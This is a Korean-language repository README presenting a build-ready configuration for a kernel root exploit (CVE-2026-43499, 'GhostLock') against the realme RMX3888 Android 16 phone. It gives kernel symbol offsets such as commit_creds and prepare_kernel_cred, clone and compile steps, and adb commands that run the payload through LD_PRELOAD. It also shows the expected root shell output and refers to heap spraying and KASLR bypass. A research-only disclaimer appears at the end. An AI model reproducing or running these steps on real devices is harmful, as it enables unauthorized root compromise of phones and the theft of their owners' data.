
rmx3888-cve-2026-43499-config v0.2.0
realme RMX3888(Android 16)용 CVE-2026-43499 익스플로잇 구성 - 검증된 커널 오프셋 20개
realme RMX3888용 CVE-2026-43499 익스플로잇 구성
기기 정보
- 브랜드/모델: realme RMX3888
- Android 버전: 16 (SDK 36)
- 빌드 ID: BP2A.250605.015
- 커널: Linux 6.1.141-android14-11-o-gffc54a6d2287
- SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
- 아키텍처: ARM64 (aarch64)
개요
이 저장소는 realme RMX3888 기기를 대상으로 하는 CVE-2026-43499(GhostLock) 익스플로잇의 완전한 구성 파일을 포함합니다. 모든 커널 오프셋은 기기의 boot.img에서 추출 및 검증되었습니다.
기능
✓ 검증된 커널 오프셋 20개는 vmlinux에서 추출
✓ 실시간 로깅은 커널 패닉 안전을 위한 O_SYNC + fsync 사용
✓ RMX3888 전용 기기 구성
✓ NDK 자동 감지가 포함된 원클릭 컴파일 스크립트
✓ 빌드 가이드를 포함한 종합 문서
포함된 파일
구성 파일
- arget.h - 기기별 커널 오프셋(검증된 오프셋 20개)
- common.h - 로깅 통합이 포함된 빌드 구성
ealtime_log.h - 실시간 로깅 구현
문서
- BUILD_GUIDE.md - 전체 컴파일 가이드
eport.md - 상세 분석 보고서(1차)
ound2_report.md - 구성 보고서(2차)
- ROUND2_STATUS.md - 실행 상태 요약
- compile_status.json - 기계 판독 가능한 빌드 상태
스크립트
- compile_rmx3888.sh - 원클릭 컴파일 스크립트
빠른 시작
사전 요구 사항
- Android NDK r26d 이상
- Git Bash, Linux/WSL 또는 Termux 환경
컴파일
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Windows Git Bash에서 스크립트는 Android Studio 및 명령줄 도구에서 사용하는 기본 SDK 경로를 자동 감지합니다: /c/Android/Sdk/ndk/*.
참고: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL, COPY_SPLICE_READ는 현재 RMX3888 타깃 헤더에서 빌드 호환 대체 값을 사용합니다. 런타임 동작에 의존하기 전에 검증된 RMX3888 vmlinux 오프셋으로 교체하십시오.
사용법
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
주요 오프셋
아래의 주요 오프셋은 커널 6.1.141에서 추출되었습니다. RMX3888별 검증이 아직 필요한 빌드 호환 대체 항목은 위의 참고 사항을 참조하십시오.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
로깅 기능
통합 실시간 로깅 모듈은 다음을 제공합니다:
- 기본 로그 경로: /sdcard/Download/log_.txt
- 대체 경로: /data/local/tmp/log_.txt
- 커널 패닉 안전: 즉시 디스크 쓰기를 위해 O_SYNC + fsync() 사용
- 타임스탬프 항목: 모든 로그 항목에 정확한 타임스탬프 포함
- stderr 미러: adb logcat을 위해 로그를 stderr로도 출력
예상 결과
성공적인 익스플로잇
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
로그 파일 출력
` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
문제 해결
자세한 문제 해결 지침은 BUILD_GUIDE.md를 참조하십시오:
- 컴파일 오류
- 런타임 충돌
- KASLR 우회 문제
- SELinux 정책 차단
보안 공지
⚠️ 경고: 이 구성은 승인된 보안 연구용으로만 제공됩니다.
- 소유한 기기에서만 사용하십시오
- 승인 없이 컴파일된 바이너리를 배포하지 마십시오
- 책임 있는 공개 관행을 준수하십시오
- 로그 파일에는 민감한 시스템 정보가 포함될 수 있습니다
기술 세부 사항
추출 프로세스
- Android Boot Image v4 파서를 사용하여 boot.img 압축 해제
- vmlinux-to-elf를 사용하여 vmlinux 추출(심볼 102,871개)
- 유효한 심볼 99,580개를 파싱 및 분석
- 중요 오프셋 20개 교차 검증
- 심볼 주소 일관성 검사를 통한 오프셋 검증
오프셋 검증
- 커널 베이스 주소 확인됨: 0xffffffc008000000
- 모든 심볼 주소를 메모리 레이아웃과 대조하여 검증
- 참조 기기(Google Pixel tokay)와 교차 참조
- 추출 성공률 100% (20/20 오프셋)
참조 자료
- CVE-2026-43499: GhostLock - Ion 할당기 UAF 취약점
- 익스플로잇 소스: https://github.com/NebuSec/CyberMeowfia
- 대상 기기: realme RMX3888 (Snapdragon 8 Gen 3)
라이선스
이 구성은 교육 및 보안 연구 목적으로만 제공됩니다.
고지 사항
이 저장소에는 보안 연구 자료가 포함되어 있습니다. 작성자와 기여자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다. 사용에 따른 책임은 본인에게 있으며, 소유한 기기 또는 명시적 테스트 승인을 받은 기기에서만 사용하십시오.
생성일: 2026-07-23
커널 버전: 6.1.141-android14-11-o-gffc54a6d2287
오프셋 검증: 100% (20/20)
상태: 컴파일 준비 완료